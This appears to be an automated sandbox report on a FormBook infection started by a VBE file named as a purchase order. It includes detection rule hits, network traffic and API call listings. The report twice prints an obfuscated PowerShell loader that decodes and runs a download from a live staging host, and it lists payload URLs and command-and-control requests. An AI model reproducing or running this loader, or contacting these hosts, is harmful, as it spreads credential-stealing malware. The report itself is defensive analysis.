  • 0x16e6c:$s4: +=
  • 0x16eec:$s4: +=
  • 0x16fb2:$s4: +=
  • 0x17032:$s4: +=
  • 0x17208:$s4: +=
  • 0x1728c:$s4: +=
  • 0xc96b:$e4: Get-WmiObject
  • 0xcb5a:$e4: Get-Process
  • 0xcbb2:$e4: Start-Process
  • 0x17b69:$e4: Get-Process

System Summary

Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Narudzba ACH0036173.vbe", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Narudzba ACH0036173.vbe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Narudzba ACH0036173.vbe", ProcessId: 6572, ProcessName: wscript.exe
Source: Network Connection | Author: frack113 | Data: DestinationIp: 162.159.140.237, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 1852, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49737
Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Narudzba ACH0036173.vbe", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Narudzba ACH0036173.vbe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Narudzba ACH0036173.vbe", ProcessId: 6572, ProcessName: wscript.exe
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Lediggang Graadighedens Disciplineringer Bagermestrene Teutonisk Uptilt #>;$Spegeplserne='Nymaledes';<#Messiness Compromising Anaphalis Gennemarbejdelsen Fodervikkerne #>;$Laparotomize140=$host.'PrivateData';If ($Laparotomize140) {$Trikotagefabrikker++;}function Spdbarnsplejerens($Ledningernes){$Annelism=$Totlafholdenhed61+$Ledningernes.Length-$Trikotagefabrikker; for( $Omgik=7;$Omgik -lt $Annelism;$Omgik+=8){$Methodisers='Exuscitate';$Protaspis+=$Ledningernes[$Omgik];$Newsroom204='Dkfjers';}$Protaspis;}function Optllingslister($baulky){ & ($Unark) ($baulky);}$Steamboating=Spdbarnsplejerens 'MouthfuMDecollaoUarb,jdzRaabaaniUdf ldelundertilAntipreaNebra.k/Averrab5stedbrd.Faglrer0 Ful,vr Blottel(Porch dWB taliniAfgangsnRati,nedPopuliso Ove clwAllokatsBegnawn HjertebN Kal etTTempl r Materia1Haunche0Waylanr. instit0Gri tmi;Departe c araciW,uccubei.aftkjonandest 6Eardro 4 Increa; Delege Finansrx Uterom6 mysti 4Fgtmedd;a,reste barramurMacroptvKonvolu:Re ligh1 Graph 2Argenti1Delubru.Apace a0Bebutto)Lystbaa unquietG Spelmae TwelfhcAttak ekSkamrdmoQuantis/Persona2Hemidom0Noggkas1 Nonchr0,anebry0Jaszmal1Futu is0Ud lugt1 Arquat BararmFLikenesiQuizzysrIchthyoeLuncherfOzoniz.oRaastofx.hefmgl/Gra,bea1Aym sar2 Fje,ne1.ongrat.Andelss0No merc ';$Railcard=Spdbarnsplejerens 'syltdepuSoapfissdkningsESvartidRRidning- Er,rinA PainkigOverophE GustinN NegatiTForkerk ';$Ekspatrieret=Spdbarnsplejerens 'Bille thG,ilingtThrenodtBibliotpNonevilsSkydere:Evangel/ mpetu/ Fili,tp DatostuSpecialb Blomme-Tremour2pladshof Achi l7Nipsetsd Quater0 upersu7gagered1Vgtford5 Repr.f3,nakepreGreeneraHousefl1ev kost4 B.odsp0Moduler3Ansamle1Jengene8Sockhea4 leopardStengun6Bioscie2Tonikum2U,ifiab6Skammel6Litigatd Ind kr9unperv.cAfisnin2Regiona8theodraeAngolan4S hoolb1 Thelyt. 
StavnsrTeleotr2T pefli.drmmebid ConspieMicrotovTopchef/UdlistnnTaagetmePennyspdDr gbolkRiddersoTrvlerng KrgendeRecan.e. betacim Kruspes DeadmeoHusass ';$Overrigidness=Spdbarnsplejerens 'Soapyre>Indsnus ';$Unark=Spdbarnsplejerens 'Terningi,vergeneSlank ixKaosets ';$Metaprescutum='Caddises';$Arkivskab='\Nationalsocialisternes.Ska';Optllingslister (Spdbarnsplejerens 'Uhjlpso$BepaidlgBetali lRea izaoDisser,bEspartoATyr fgtlKlderen:Cebid nm ogejome S ppreKPapembaa Oblig.NklinikliBankemaShaplontMo dsgnieFinlandRHenns.n= N.trog$ ego,seEPlasmasn.ultideVIllegit:Bu.kladApel,rgoPRakitispQuincyuD GuidebA antasiTThomisiAUnhands+wasabis$Racial,aN nsurgRUnmercekForsortiDolomitVAmn,monS Et,opikBulwarkAPungpebbBowkerb ');Optllingslister (Spdbarnsplejerens 'Excla,m$KronpriGOpvaskelStumbleO otulisB Forma,aSulfosrLDiscolo: NightiITendo.oNUnwiseqd Libra i BesselSpakhusetWindburi PneumoNE,rthwacAdaptivtAgranulNFlambeeESlingreSAnnot tsUdv elg= Orchit$UncapiteLinj,skKReflektsBleeralPEnta glAKannikkTBedstevRIagttagiSnotdumEnabofamrnostalgePara.phTAcrolog.Reak orSB listip pologeLRhipidoI esidenTDonnere(Hematoz$zenithwoRadiofrVEmpireneMilieufr Dknernr TeaktriBogsideGMer
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-05T14:51:15.879361+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49946 | 84.32.84.32 | 80 | TCP
2024-10-05T14:51:39.172827+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50008 | 84.32.84.32 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-05T14:50:25.120627+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49737 | 162.159.140.237 | 443 | TCP


AV Detection

Source: Narudzba ACH0036173.vbe | ReversingLabs: Detection: 26%
Source: Narudzba ACH0036173.vbe | Virustotal: Detection: 11%
Source: Yara match | File source: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.2955140831.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2543568933.0000000024700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2955372386.0000000002BD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.2955148766.0000000002D00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.2955249123.0000000004C30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2544153499.0000000024B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: unknown | HTTPS traffic detected: 162.159.140.237:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.140.237:443 -> 192.168.2.4:49737 version: TLS 1.2
          Source: Binary string: msinfo32.pdb source: msiexec.exe, 0000000B.00000003.2464231519.0000000024601000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: bqm.Core.pdb4 source: powershell.exe, 00000006.00000002.2057275222.0000000008137000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: msiexec.exe, 0000000B.00000003.2397408093.00000000244C5000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: msiexec.exe, msiexec.exe, 0000000B.00000003.2397408093.00000000244C5000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe
          Source: Binary string: msinfo32.pdbGCTL source: msiexec.exe, 0000000B.00000003.2464231519.0000000024601000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_02ECC110 FindFirstFileW,FindNextFileW,FindClose

          Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 4x nop then xor eax, eax | 13_2_02EB99F0
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 4x nop then mov ebx, 00000004h | 13_2_04D204DE

          Networking

Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49946 -> 84.32.84.32:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50008 -> 84.32.84.32:80
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping 6777.6777.6777.677e
Source: Joe Sandbox View | IP Address: 162.159.140.237
Source: Joe Sandbox View | IP Address: 84.32.84.32
Source: Joe Sandbox View | ASN Name: NTT-LT-ASLT
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49737 -> 162.159.140.237:443
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /nedkoge.mso HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
    Host: pub-2f7d07153ea1403184d62266d9c28e41.r2.dev
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /BEkfITzYaj231.bin HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
    Host: pub-2f7d07153ea1403184d62266d9c28e41.r2.dev
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /7z6q/?-Ly=tZ6DMnK&ZppxP=TL3drwoENxP57Dd5dOFmv/YKWz0ccyhnGCQdWwUu3IMTL8D4S+Gi1DMSnGJbZzhysdvLIJdHJUOvGXStrAsLXN7Ufb7PIiPGRqZTCzOmV2/ygr+YHVnslTQ= HTTP/1.1
    Accept: */*
    Accept-Language: en-US,en;q=0.9
    Host: www.casesrep.site
    Connection: close
    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
Source: global traffic | HTTP traffic detected: GET /7z6q/?ZppxP=TL3drwoENxP57Dd5dOFmv/YKWz0ccyhnGCQdWwUu3IMTL8D4S+Gi1DMSnGJbZzhysdvLIJdHJUOvGXStrAsLXN7Ufb7PIiPGRqZTCzOmV2/ygr+YHVnslTQ=&-Ly=tZ6DMnK HTTP/1.1
    Accept: */*
    Accept-Language: en-US,en;q=0.9
    Host: www.casesrep.site
    Connection: close
    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
Source: global traffic | DNS traffic detected: DNS query: 6777.6777.6777.677e
Source: global traffic | DNS traffic detected: DNS query: pub-2f7d07153ea1403184d62266d9c28e41.r2.dev
Source: global traffic | DNS traffic detected: DNS query: www.casesrep.site
Source: global traffic | DNS traffic detected: DNS query: www.kuaimaolife.shop
Source: unknown | HTTP traffic detected: POST /7z6q/ HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    Host: www.casesrep.site
    Origin: http://www.casesrep.site
    Connection: close
    Cache-Control: max-age=0
    Content-Length: 202
    Content-Type: application/x-www-form-urlencoded
    Referer: http://www.casesrep.site/7z6q/
    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
    Data Ascii: ZppxP=eJf9oHVNYSPFhEh9fslv0q4Oez8xJEQzQRsfQDkRt7hwYf3AfPDYtzwbl3VGRFF0osCnXZFgJmj+AWHipXcEFNzBeYzmEWvyUsRzCDCHPEHgwLO2MWKarRL+YoU9gpn625f8kT3MgUnzy2GqBqrY53Vy9fBENJwX5LWoRNnnQGspdrJdlUH2lPq/2LJWM9VTiQ==
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
    Server: nginx
    Date: Sat, 05 Oct 2024 12:51:45 GMT
    Content-Type: text/html
    Content-Length: 146
    Connection: close
    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
    Server: nginx
    Date: Sat, 05 Oct 2024 12:51:48 GMT
    Content-Type: text/html
    Content-Length: 146
    Connection: close
    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: powershell.exe, 00000004.00000002.1862118797.0000020AF32F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2043963608.0000000005918000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000006.00000002.2017385313.0000000004A0B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.1839361378.0000020AE5009000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pub-2f7d07153ea1403184d62266d9c28e41.r2.dev
Source: powershell.exe, 00000004.00000002.1839361378.0000020AE3281000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2017385313.00000000048B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.2017385313.0000000004A0B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000004.00000002.1839361378.0000020AE3281000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000006.00000002.2017385313.00000000048B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000006.00000002.2043963608.0000000005918000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.2043963608.0000000005918000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.2043963608.0000000005918000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000006.00000002.2017385313.0000000004A0B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000004.00000002.1839361378.0000020AE3E41000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: powershell.exe, 00000004.00000002.1862118797.0000020AF32F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2043963608.0000000005918000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000004.00000002.1839361378.0000020AE4CB9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1839361378.0000020AE34AB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pub-2f7d07153ea1403184d62266d9c28e41.r2.dev
Source: msiexec.exe, 0000000B.00000003.2400330644.0000000008CD0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://pub-2f7d07153ea1403184d62266d9c28e41.r2.dev/
Source: msiexec.exe, 0000000B.00000003.2400330644.0000000008CD0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2530755175.0000000008CA8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://pub-2f7d07153ea1403184d62266d9c28e41.r2.dev/BEkfITzYaj231.bin
Source: msiexec.exe, 0000000B.00000003.2400330644.0000000008CD0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://pub-2f7d07153ea1403184d62266d9c28e41.r2.dev/BEkfITzYaj231.bin$Y
Source: msiexec.exe, 0000000B.00000002.2530755175.0000000008CA8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://pub-2f7d07153ea1403184d62266d9c28e41.r2.dev/BEkfITzYaj231.binE
Source: msiexec.exe, 0000000B.00000002.2530755175.0000000008CA8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://pub-2f7d07153ea1403184d62266d9c28e41.r2.dev/BEkfITzYaj231.bing
Source: msiexec.exe, 0000000B.00000003.2400330644.0000000008CD0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://pub-2f7d07153ea1403184d62266d9c28e41.r2.dev/M
Source: powershell.exe, 00000004.00000002.1839361378.0000020AE34AB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pub-2f7d07153ea1403184d62266d9c28e41.r2.dev/nedkoge.msoP
Source: powershell.exe, 00000006.00000002.2017385313.0000000004A0B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pub-2f7d07153ea1403184d62266d9c28e41.r2.dev/nedkoge.msoXR
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown | HTTPS traffic detected: 162.159.140.237:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.140.237:443 -> 192.168.2.4:49737 version: TLS 1.2

          E-Banking Fraud

Source: Yara match | File source: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.2955140831.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2543568933.0000000024700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2955372386.0000000002BD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.2955148766.0000000002D00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.2955249123.0000000004C30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2544153499.0000000024B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

Source: amsi32_5812.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.2955140831.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.2543568933.0000000024700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000F.00000002.2955372386.0000000002BD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.2955148766.0000000002D00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.2955249123.0000000004C30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.2544153499.0000000024B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: powershell.exe PID: 1068, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5812, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c ping 6777.6777.6777.677e
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Lediggang Graadighedens Disciplineringer Bagermestrene Teutonisk Uptilt #>;$Spegeplserne='Nymaledes';<#Messiness Compromising Anaphalis Gennemarbejdelsen Fodervikkerne #>;$Laparotomize140=$host.'PrivateData';If ($Laparotomize140) {$Trikotagefabrikker++;}function Spdbarnsplejerens($Ledningernes){$Annelism=$Totlafholdenhed61+$Ledningernes.Length-$Trikotagefabrikker; for( $Omgik=7;$Omgik -lt $Annelism;$Omgik+=8){$Methodisers='Exuscitate';$Protaspis+=$Ledningernes[$Omgik];$Newsroom204='Dkfjers';}$Protaspis;}function Optllingslister($baulky){ & ($Unark) ($baulky);}$Steamboating=Spdbarnsplejerens 'MouthfuMDecollaoUarb,jdzRaabaaniUdf ldelundertilAntipreaNebra.k/Averrab5stedbrd.Faglrer0 Ful,vr Blottel(Porch dWB taliniAfgangsnRati,nedPopuliso Ove clwAllokatsBegnawn HjertebN Kal etTTempl r Materia1Haunche0Waylanr. instit0Gri tmi;Departe c araciW,uccubei.aftkjonandest 6Eardro 4 Increa; Delege Finansrx Uterom6 mysti 4Fgtmedd;a,reste barramurMacroptvKonvolu:Re ligh1 Graph 2Argenti1Delubru.Apace a0Bebutto)Lystbaa unquietG Spelmae TwelfhcAttak ekSkamrdmoQuantis/Persona2Hemidom0Noggkas1 Nonchr0,anebry0Jaszmal1Futu is0Ud lugt1 Arquat BararmFLikenesiQuizzysrIchthyoeLuncherfOzoniz.oRaastofx.hefmgl/Gra,bea1Aym sar2 Fje,ne1.ongrat.Andelss0No merc ';$Railcard=Spdbarnsplejerens 'syltdepuSoapfissdkningsESvartidRRidning- Er,rinA PainkigOverophE GustinN NegatiTForkerk ';$Ekspatrieret=Spdbarnsplejerens 'Bille thG,ilingtThrenodtBibliotpNonevilsSkydere:Evangel/ mpetu/ Fili,tp DatostuSpecialb Blomme-Tremour2pladshof Achi l7Nipsetsd Quater0 upersu7gagered1Vgtford5 Repr.f3,nakepreGreeneraHousefl1ev kost4 B.odsp0Moduler3Ansamle1Jengene8Sockhea4 leopardStengun6Bioscie2Tonikum2U,ifiab6Skammel6Litigatd Ind kr9unperv.cAfisnin2Regiona8theodraeAngolan4S hoolb1 Thelyt. 
StavnsrTeleotr2T pefli.drmmebid ConspieMicrotovTopchef/UdlistnnTaagetmePennyspdDr gbolkRiddersoTrvlerng KrgendeRecan.e. betacim Kruspes DeadmeoHusass ';$Overrigidness=Spdbarnsplejerens 'Soapyre>Indsnus ';$Unark=Spdbarnsplejerens 'Terningi,vergeneSlank ixKaosets ';$Metaprescutum='Caddises';$Arkivskab='\Nationalsocialisternes.Ska';Optllingslister (Spdbarnsplejerens 'Uhjlpso$BepaidlgBetali lRea izaoDisser,bEspartoATyr fgtlKlderen:Cebid nm ogejome S ppreKPapembaa Oblig.NklinikliBankemaShaplontMo dsgnieFinlandRHenns.n= N.trog$ ego,seEPlasmasn.ultideVIllegit:Bu.kladApel,rgoPRakitispQuincyuD GuidebA antasiTThomisiAUnhands+wasabis$Racial,aN nsurgRUnmercekForsortiDolomitVAmn,monS Et,opikBulwarkAPungpebbBowkerb ');Optllingslister (Spdbarnsplejerens 'Excla,m$KronpriGOpvaskelStumbleO otulisB Forma,aSulfosrLDiscolo: NightiITendo.oNUnwiseqd Libra i BesselSpakhusetWindburi PneumoNE,rthwacAdaptivtAgranulNFlambeeESlingreSAnnot tsUdv elg= Orchit$UncapiteLinj,skKReflektsBleeralPEnta glAKannikkTBedstevRIagttagiSnotdumEnabofamrnostalgePara.phTAcrolog.Reak orSB listip pologeLRhipidoI esidenTDonnere(Hematoz$zenithwoRadi
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_248935C0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_24892DF0 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_24894650 NtSuspendThread
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_24893090 NtSetValueKey
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04F04650 NtSuspendThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04F04340 NtSetContextThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04F02CA0 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04F02C70 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04F02C60 NtCreateKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04F02DF0 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04F02DD0 NtDelayExecution,LdrInitializeThunk
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04F02D30 NtUnmapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04F02D10 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04F02EE0 NtQueueApcThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04F02E80 NtReadVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04F02FE0 NtCreateFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04F02FB0 NtResumeThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04F02F30 NtCreateSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04F02AF0 NtWriteFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04F02AD0 NtReadFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04F02BF0 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04F02BE0 NtQueryValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04F02BA0 NtEnumerateValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04F02B60 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04F035C0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04F039B0 NtGetContextThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04F02CF0 NtOpenProcess
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04F02CC0 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04F02C00 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04F02DB0 NtEnumerateKey
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04F02D00 NtSetInformationFile
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04F02EA0 NtAdjustPrivilegesToken
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04F02E30 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04F02FA0 NtQuerySection
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04F02F90 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04F02F60 NtCreateProcessEx
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04F02AB0 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04F02B80 NtQueryInformationFile
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 13_2_04F03090 NtSetValueKey
